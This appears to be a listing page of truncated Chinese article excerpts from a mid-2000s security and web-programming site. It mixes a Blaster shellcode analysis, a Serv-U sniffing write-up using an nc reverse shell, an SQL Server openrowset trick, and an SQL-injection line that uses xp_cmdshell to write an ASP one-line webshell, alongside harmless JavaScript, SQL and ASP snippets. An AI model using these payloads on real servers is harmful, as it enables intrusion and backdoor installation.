2年前“冲击波”病毒爆发时，我曾经对它的SHELLCODE进行过分析，现在把我当时写的分析献出来，  让大家看看“一代名毒”是怎样的。一般来说，shellcode都是这样写的，因此只要hook shellcode必须调用的api，判断esp和eip  的差值如果在0x1000以内（也就是说代码在堆栈里运行），那么基本上可以确认系统受到缓冲区溢出攻击，该进程必须马上退出。  当然，有些更厉害的shellcode采用直接调用native api,raw socket收发包等技术，hook api监视...

前言:幻影Mix修改的flashsky的那个端口复用下的嗅探serv-u,经测试,不能用于win2003服务器中,具体我也不知道,不知道是不是操作有识,反正我是没成功过.我自己构造了一个环境试了一下,嗅探程序是自己写的,利用raw进行嗅探,如果要arp的话,要装那个wincap,想一想那么低的权限是不可能的.实验环境:Windows2003服务器+海洋2006+serv-u5.2服务器不能直接使用cmd.exe,但可以上传后利用wscript.shell组件执行命令.实验步骤:1.利用wcript.shell执行nc 反弹得到shell2.利用自编写工具进行嗅探(我只嗅探21和900...

下面我要谈到一些Sqlserver新的Bug，虽然本人经过长时间的努力，当然也有点幸运的成分在内，才得以发现，不敢一个人独享，拿出来请大家鉴别。 1．关于Openrowset和Opendatasource 可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下： select * from openrowset(’sqloledb’,’myserver’;’sa’;’’,’select * from table’) 可见（即使从字面意义上...

[html]<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> neverSpliter - http://www.never-online.net </title> <meta http-equiv="ImageToolbar" content="no" /> <meta name="author" content="nev...

作者：netpatch来源：邪恶八进制 中国说明：批处版——SC首先要感谢zzzEVAzzz，这个批处程序就是根据他发布的《Do All in Cmd Shell》文中的资料编写而成！原理就是根据INF文件的功能（关于inf文件的详细信息，可以参考DDK帮助文档。）加以自动化编写而成！难度很低，偶只用了十来分钟就编写出了这个批处程序。（高手看了不要笑哦……）具体用法：安装服务语法为：np 服务名 /a 服务显示名称 服务描述 启动类型 要添加成服务的程序地址 /s例子：例如我...

Slider类的功能说明：1、可以控制任何一个页面上存在的div2、slider在滑动的同时还可以实现透明度的变化，整个过程更平滑、更美观3、可控性强，通过多个参数实现不同大小的div不同方向、不同速度的滑动4、调用方便，一句话即可初始化，slider的隐现控制更为简单，详情参见代码例子关于Slider类实现过程的说明：有感于现在的网站经常使用所谓Web2.0模式的div隐现效果，前一段自己在网页上要实现一个，尝试成功后又想封装一个类方便以后使用，也可以开放给大家使用，刚好还可以学习一下javascript的类编程方法（兄弟以前一直用微软的东西，对javascript不熟），过程当中遇到一点问...

-1、查找员工的编号、姓名、部门和出生日期，如果出生日期为空值，--显示日期不详,并按部门排序输出,日期格式为yyyy-mm-dd。select emp_no ,emp_name ,dept ,isnull(convert(char(10),birthday,120),’日期不详’) birthdayfrom employeeorder by dept --2、查找与喻自强在同一个单位的员工姓名、性别、部门和职称select emp_no,emp_name,dept,titlefrom ...

 1、   用^转义字符来写ASP(一句话木马)文件的方法:?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell ’echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp’;-- ? &nb...

方法1： ------------------------------------  Server Application Error  The server has encountered an error while loading an application during the processing of your request. Please ...

看过的朋友可帮忙顶哦,这些代码都是第一次发的,外面很多要不就是很复杂,看不懂,要不就是不能用的,下面的我写时候已经尽量简洁明了外面很多所谓sitemap生成代码都只生成目录文件地址,没生成动态的,我后来自己写了这个,是支持动态的,例子:如你是文章网站,文章有2000条,那你修改下对应你的文章数据表,即可生成除了所有目录文件外,还生成你的动态2000条地址,绝对的没话说,生成速度非常快把下面代码保存为sitemap.asp文件,修改我已注明的几个地方,其他的一概不要修改,好不好用过才知道 [code]<!--#include file="conn.asp"-->&...

针对症状，我先上网找了相关的资料，首先，要显示隐藏文件　　在这个:HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\　　Advanced\Folder\Hidden\SHOWALL，将CheckedValue键值修改为1　　还是没有用，隐藏文件还是没有显示，仔细观察发现病毒它有更狠的招数:它在修改注册表达到隐藏文件目的之后，为了稳妥起见，把本来有效的DWORD值CheckedValue删除掉，新建了一个无效的字符串值CheckedValue，并且把键值改为0(如图)!这样你以为把0改为1就会万事大吉，可是...